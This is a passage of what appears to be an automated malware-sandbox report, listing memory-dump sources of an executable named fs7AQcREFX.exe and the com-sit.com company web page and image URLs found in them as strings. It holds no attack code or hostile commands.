                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/ueberbestaende/
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/unser-logo/
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/unser-team/
                      Source: fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/unternehmensethik/
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/ursprung/
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/usa/
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/visual-inspection/
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/warenpruefung-lagerung/
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/03/4.png
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/03/C1.png
                      Source: fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/03/Comsit-1024x222.png
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/03/Comsit-1536x334.png
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/03/Comsit-300x65.png
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/03/Comsit-768x167.png
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/03/Comsit.png
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/03/i2-150x150.png
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 